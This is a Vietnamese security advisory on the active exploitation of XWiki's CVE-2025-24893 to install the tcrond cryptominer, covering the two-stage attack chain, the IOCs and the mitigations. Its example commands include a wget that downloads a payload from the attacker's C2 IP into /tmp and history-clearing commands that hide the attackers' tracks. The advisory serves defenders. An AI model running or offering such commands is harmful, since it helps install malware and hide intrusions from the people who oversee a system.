Một lỗ hổng CVE nghiêm trọng trong phần mềm cộng tác XWiki đang bị các tác nhân đe dọa khai thác chủ động để triển khai mã độc đào tiền ảo trên các hệ thống dễ bị tổn thương. Lỗ hổng này đại diện cho một nguy cơ lớn đối với các tổ chức đang chạy các cài đặt XWiki chưa được vá lỗi.

Phân Tích Kỹ Thuật Lỗ Hổng CVE-2025-24893

Lỗ hổng bảo mật được định danh là CVE-2025-24893 là một điểm yếu nghiêm trọng không yêu cầu xác thực. Nó tồn tại trong endpoint SolrSearch của XWiki, cho phép kẻ tấn công thực hiện kỹ thuật chèn template (template injection) để tiêm mã độc hại.

Việc khai thác lỗ hổng này không đòi hỏi bất kỳ thông tin đăng nhập nào, khiến nó trở nên đặc biệt nguy hiểm đối với các cài đặt XWiki có thể truy cập từ internet. Các tác nhân đe dọa có thể gửi một yêu cầu HTTP được chế tạo đặc biệt tới endpoint dễ bị tổn thương.

Yêu cầu này sử dụng các tham số được mã hóa URL để thực thi các lệnh từ xa trên hệ thống XWiki mục tiêu. Cơ chế chèn template cho phép kẻ tấn công điều khiển quá trình hiển thị dữ liệu, từ đó chèn và thực thi mã tùy ý.

Chi tiết về lỗ hổng có thể được tìm thấy tại NVD NIST.

Cơ Chế Khai Thác Hai Giai Đoạn của Cuộc Tấn Công Mạng

Các nhà nghiên cứu an ninh mạng tại VulnCheck đã thu thập bằng chứng cụ thể về việc khai thác chủ động thông qua mạng lưới canary của họ. Các cuộc tấn công mạng này có nguồn gốc từ các tác nhân đe dọa ở Việt Nam, những người sử dụng phương pháp tấn công hai giai đoạn tinh vi.

Giai Đoạn Một: Khởi Tạo Xâm Nhập và Tải Xuống

Giai đoạn đầu tiên của quá trình khai thác bắt đầu bằng việc kẻ tấn công gửi một yêu cầu được chế tạo đặc biệt đến endpoint SolrSearch dễ bị tổn thương của XWiki. Yêu cầu này chứa mã độc hại được nhúng thông qua kỹ thuật template injection.

Mã được tiêm sẽ kích hoạt việc tải xuống một script bash nhỏ từ máy chủ điều khiển và kiểm soát (C2). Máy chủ C2 này có địa chỉ IP là 193.32.208.24, nơi lưu trữ các payload độc hại thông qua một instance transfer.sh.

Script tải xuống (downloader) này được lưu trữ vào thư mục /tmp trên các hệ thống bị xâm nhập. Đây là một vị trí phổ biến cho các tệp tạm thời, thường không được giám sát chặt chẽ.

Một ví dụ về lệnh tải xuống có thể được sử dụng:

wget http://193.32.208.24/payload.sh -O /tmp/downloader.sh

Giai Đoạn Hai: Triển Khai và Duy Trì Mã Độc Đào Tiền Ảo

Khoảng 20 phút sau giai đoạn tải xuống ban đầu, kẻ tấn công quay lại với yêu cầu thứ hai. Yêu cầu này nhằm mục đích thực thi script downloader đã được lưu trữ trước đó.

Việc thực thi downloader sẽ khởi đầu toàn bộ chuỗi lây nhiễm. Script này ngay lập tức tìm nạp thêm hai payload bổ sung, chúng hoạt động cùng nhau để thiết lập cơ chế duy trì (persistence) và triển khai hoạt động đào tiền ảo.

• Một script có nhiệm vụ cài đặt mã độc đào tiền ảo có tên là tcrond vào một thư mục ẩn trên hệ thống.
• Script thứ hai đảm nhận việc chấm dứt các tiến trình đào tiền ảo cạnh tranh đang chạy trên hệ thống. Sau đó, nó sẽ khởi chạy phần mềm đào tiền ảo độc hại, được cấu hình để kết nối với các pool đào tiền ảo tại c3pool.org.

Các hành vi chống phân tích và che giấu dấu vết cũng được triển khai. Mã độc đào tiền ảo này được đóng gói bằng UPX để né tránh sự phát hiện và sử dụng một số kỹ thuật chống phân tích.

Khi được kích hoạt, miner sẽ cố gắng tiêu diệt các tiến trình đào tiền ảo khác trên hệ thống, xóa lịch sử lệnh và vô hiệu hóa việc ghi nhật ký lịch sử bash để che giấu các hành động của nó. Ví dụ về lệnh có thể được sử dụng để xóa lịch sử:

history -c
unset HISTFILE
export HISTFILE=/dev/null

Các Chỉ Số Thỏa Hiệp (IOCs) và Cơ Sở Hạ Tầng Tấn Công

Các nhà nghiên cứu bảo mật đã xác định cơ sở hạ tầng tấn công chính tại địa chỉ IP 123.25.249.88. Địa chỉ này đã có nhiều báo cáo trên AbuseIPDB về hoạt động độc hại. Việc nhận diện kịp thời các lỗ hổng CVE và IOCs là rất quan trọng.

Các chỉ số thỏa hiệp liên quan đến chiến dịch này bao gồm:

• Địa chỉ IP C2: 193.32.208.24
• Địa chỉ IP Cơ sở hạ tầng tấn công chính: 123.25.249.88
• Mã độc đào tiền ảo: tcrond (UPX-packed)
• Pool đào tiền ảo: c3pool.org
• Vị trí tải xuống tạm thời: /tmp/downloader.sh
• Kỹ thuật che giấu: Xóa lịch sử lệnh, vô hiệu hóa ghi nhật ký lịch sử bash.

Tình Trạng Khai Thác và Ghi Nhận Chính Thức

Bất chấp việc đã có bằng chứng về khai thác zero-day trong thực tế, lỗ hổng CVE-2025-24893 đáng chú ý là không xuất hiện trong danh mục Lỗ hổng bị khai thác đã biết (Known Exploited Vulnerabilities – KEV) của CISA. Điều này làm nổi bật một khoảng trống đáng lo ngại giữa các cuộc tấn công thực tế và sự công nhận chính thức.

VulnCheck đã thêm lỗ hổng này vào cơ sở dữ liệu KEV của riêng họ vào tháng 3 năm 2025, sau khi nhiều tổ chức bảo mật bao gồm Cyble, Shadow Server và CrowdSec báo cáo các nỗ lực khai thác. Chi tiết về việc khai thác trong thực tế có thể tham khảo tại blog của VulnCheck.

Sự chậm trễ trong việc đưa vào các danh mục chính thức có thể khiến nhiều tổ chức không nhận thức được mức độ nghiêm trọng và sự cấp bách của việc vá lỗi, tăng nguy cơ bị xâm nhập.

Biện Pháp Giảm Thiểu và Phòng Chống Lỗ Hổng CVE

Các tổ chức đang vận hành XWiki phải ngay lập tức thực hiện các biện pháp giảm thiểu để bảo vệ hệ thống của mình khỏi việc khai thác lỗ hổng CVE này. Sự chủ động trong bảo mật là yếu tố then chốt.

• Cập nhật bản vá ngay lập tức: XWiki cần được cập nhật lên các phiên bản đã được vá lỗi ngay lập tức. Đây là biện pháp phòng thủ hiệu quả nhất để khắc phục lỗ hổng CVE-2025-24893.
• Giám sát hệ thống: Cần liên tục giám sát các hệ thống XWiki để tìm kiếm các chỉ số thỏa hiệp (IOCs) đã được xác định. Bất kỳ hoạt động bất thường nào cũng cần được điều tra ngay lập tức.
• Chặn địa chỉ IP độc hại: Quản trị viên mạng nên chặn giao tiếp với các địa chỉ IP độc hại đã được xác định, bao gồm 193.32.208.24 và 123.25.249.88, tại tường lửa hoặc thiết bị bảo mật mạng.
• Tìm kiếm hàm băm tệp độc hại: Cần quét và tìm kiếm các hàm băm (hash) tệp cụ thể liên quan đến chiến dịch này trên toàn bộ hệ thống để phát hiện và loại bỏ mã độc.

Tính chất từ xa của lỗ hổng CVE này và việc không yêu cầu xác thực khiến nó đặc biệt nguy hiểm đối với các cài đặt XWiki có thể truy cập từ internet. Việc hành động nhanh chóng là cần thiết để ngăn chặn các cuộc tấn công tiếp theo.